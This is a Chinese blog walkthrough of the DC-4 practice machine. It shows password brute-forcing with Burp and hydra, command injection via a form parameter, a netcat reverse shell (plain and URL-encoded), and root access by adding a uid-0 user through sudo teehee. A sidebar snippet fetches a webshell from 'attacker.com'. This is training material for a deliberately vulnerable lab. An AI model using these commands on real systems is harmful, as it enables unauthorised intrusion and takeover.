DC-4渗透实战(详细过程)

已于 2022-10-23 13:35:55 修改
阅读量749 收藏 2
点赞数 4
分类专栏: DC渗透实战 文章标签: 网络安全 安全 web安全 系统安全
于 2022-10-17 13:09:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39291229/article/details/127361004
版权

目录

DC-4靶机

1.主机发现

2.端口扫描

3.网页信息探测

4.敏感目录扫描

5.Web渗透

暴力破解

任意命令执行

6.主机渗透

反弹shell

交互式getshell

尝试提权

九头蛇爆破

深入探测

最终提权

DC-4靶机

DC-4靶机下载地址https://www.five86.com/downloads/DC-4.zip

安装可参照我DC-1文章

安装完成后 确保DC-4和kali处在同一网段下

1.主机发现

arp-scan -l

对比靶机MAC地址

确认靶机IP为192.168.20.142

2.端口扫描

nmap -sV -p- 192.168.20.142

开放了80端口和22端口

3.网页信息探测

浏览器访问192.168.20.142:80

 出现一个登录框

用whatweb探测站点

whatweb -v 192.168.20.142

 得出信息 nginx版本为1.15.10

4.敏感目录扫描

nikto -host 192.168.20.142

 但是并没有什么敏感目录的信息

5.Web渗透

暴力破解

要登录网站就要知道账号和密码 这里直接进行暴力破解

上burpsuite

如何设置kali中的burp代理参考此文Kali学习--BurpSuite的代理功能_alex77taohua的博客-CSDN博客

登录页面中的用户名和密码框内都先输入1 然后抓包

 将数据包发送至intruder中

猜测用户名是admin(绝大部分靶机登录界面都有admin用户) 对密码进行爆破 字典的话可以网上找 也可以私信我拿 设置如下

Positions模块

Payloads模块

在payload Options[Simple list]中点击load 选择字典文件 加载字典

设置完成后 点击右上角Start attack进行暴力破解

通过观察length值的不同来判断是否有正确的密码

对length进行降序排序 发现payload为happy时 响应长度和其他payload不一样 推测happy即为登录密码

进行登录尝试

 登录成功

任意命令执行

点击command

选择List Files选项后 点击run

更换成Disk Usage选项

很明显一个选项对应一次代码执行

用burp抓取点击List Files选项后的数据包

发现ls -l命令是radio参数后的值

更改radio参数的值为pwd 点击forward放包 查看浏览器回显

pwd命令执行成功 这里有远程代码执行漏洞 可以利用此漏洞进行反弹shell

6.主机渗透

反弹shell

这里试过bash没法反弹 改用nc反弹shell

监听端口8888

nc -lvvp 8888

通过burp使DC-4靶机运行如下代码 以反弹shell

nc -e /bin/bash 192.168.20.130 8888

将以上代码转换为URL编码

%6e%63%20%2d%65%20%2f%62%69%6e%2f%62%61%73%68%20%31%39%32%2e%31%36%38%2e%32%30%2e%31%33%30%20%38%38%38%38

 成功反弹shell

交互式getshell

python -c 'import pty;pty.spawn("/bin/bash")'

尝试提权

拿到shell之后下一步就是通过各种方式提权拿到最高权限root

尝试SUID提权

find / -perm -4000 2>/dev/null

 并没有可以用的命令

查看一下/etc/passwd文件 看看是否有其他用户存在

cat /etc/passwd

发现三个用户

在之前进行端口扫描的时候 扫描出了22端口的ssh服务 尝试破解ssh登录

九头蛇爆破

既然有三个新增用户 那么家目录/home很有可能也有新增的用户目录 进入/home 收集一下信息

cd /home
ls
cd jim
ls
cd backups

 查看这个passwords文件

cat old-passwords.bak

将这些密码复制 在桌面新建一个txt文件 粘贴密码

用九头蛇进行ssh登录爆破

hydra -l jim -P Desktop/hydra4.txt ssh://192.168.20.142

 得到账号 jim 密码 jibril04

ssh登录

ssh jim@192.168.20.142

 输入对应的密码 成功登录

深入探测

刚才/home/jim下的mbox无法打开

现在可以打开mbox了

cat mbox

 提示我们收到了一封来自root用户的邮件

查找一下邮件mail的路径

find / -name mail

 进入该目录

cd /var/mail
ls
cat jim

 看到一个名为Charles的用户 以及密码

最终提权

直接进入该账户(小写)

su charles

 查看权限

whoami

并不是root权限 还得提权

查看一下具有root权限的命令

 发现有一个root权限的命令teehee(小型文本编辑器),可以利用这个命令进行提权

echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd  

teehee可以通过修改该文件达到添加用户的效果,文件格式为

注册名:口令:用户标识号:组标识号:用户名:用户主目录:命令解析程序 

口令为x即代表存放有密码,为空即代表没有密码,识标号为0代表root权限

su test
whoami

切换为新建的test用户 并查看权限

 查看最终flag

cd /root
ls
cat flag.txt

 成功通关!!!

tzyyyyyy
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC-4-Web渗透测试靶机
01-19
DC-4
DC-4靶机渗透测试
Liumx0105的博客
12-20 716
1、使用kali的字典爆破登录密码: /usr/share/john下的password.lst burp抓包,并且爆破到admin账号的密码 2、发现命令执行,进行利用: burp修改数据包添加反弹shell的相关命令发送到靶机,kali监听到获取shell反弹 radio=nc+192.168.182.146+4444+-e+/bin/bash&submit=Run 3、利用python获取交互shell: python -c 'import pty;pty.spawn("/bin/sh")
DC-4 靶机详解(两个解法版本)
TonyChaoWei的博客
04-11 615
DC-4 两钟解法
DC系列-dc4靶机解析
qq_53309677的博客
12-22 366
现在我们可以开始爆破(hydra)admin的用户的密码 网页用户的爆破使用(http-post-form) "/login.php(登录的路径):username=adnmin&passwor=(上面BP拦截的登录信息复制下来)^PASS^:S=logout(密码爆破出来就停止进行爆破)" 爆破出来的密码为 “happy”进入home 发现许多用户 进入jim查看文件夹的里有 备份信息的文件夹 看到里面有密码 这时候下载到渗透机并爆破jim用户的密码。登录我们爆破出来的用户jim(发现用户下面说有。
DC-4靶机
mlws1900的博客
03-24 820
下载不下来用迅雷下载。
DC-4靶场实战
qq_42754807的博客
03-30 732
DC-4靶场实战
9.100个渗透测试实战#9(DC-4)
01-09
世间一切皆可努力                                                                                                                                                                                     感谢浏览 目录   一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现阶段 1.查看kali的网卡、IP等信息;(网卡名:eth0,IP地址:192.168.97.129) 2.查看靶机页面; 3.探测特
DC-4靶机进行渗透测试
zll___的博客
03-14 425
DC-4靶机进行渗透测试
DC-4靶机实战 渗透测试
她叫常玉莹
07-23 382
使用arp-scan查看主机 arp-scan -l 靶机ip地址为192.168.0.151,使用nmap进行扫描 目标机开放了80端口与22端口,使用浏览器访问下80端口 页面是一个表单,抓下包看一下 使用jhon的字典进行爆破 密码为happy登陆一下。 点击command可以运行命令,bp抓下数据包分析下 命令是由radio参数传入的,并且使用“+”代替“ ”(空格)。发送到repeater模块修改radio参数测试一下。 可以看到命令成功执行了,说明这里存在命令注入漏洞。在/home
DC-4靶机渗透指南(渗透测试详细操作)
jrdh的博客
12-06 4452
DC-4 靶机渗透测试,帮助读者了解DC系列的具体考察内容
vuInhub靶场实战系列-DC-4实战
05-22
vuInhub靶场实战系列-DC-4实战
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
DC-4靶机渗透详细流程_多方法提权
braty_的博客
01-25 819
DC-4靶机渗透详细流程_多方法提权
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 299
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
DC-4靶机详细渗透过程
MRS_jianai的博客
11-30 489
dc4靶机渗透教程
DC4靶机渗透测试
Huangshanyoumu的博客
04-16 607
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞挖掘1.访问目标 ip,查看内容2.使用 BP 进行爆破密码3.使用密码登陆4.使用 BP 查看执行命令流量包5.替换命令来使用 nc 建立连接7.使用 nc 将靶机文件传输到攻击机8.使用 hydra 爆破 ssh 密码9.ssh 登陆,进行信息收集10.提权 描述:从靶机DC-3开始,只有一个入口和一个最终的flag, 只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境版本: VMware pro 16 Kali 202
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tzyyyyyy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值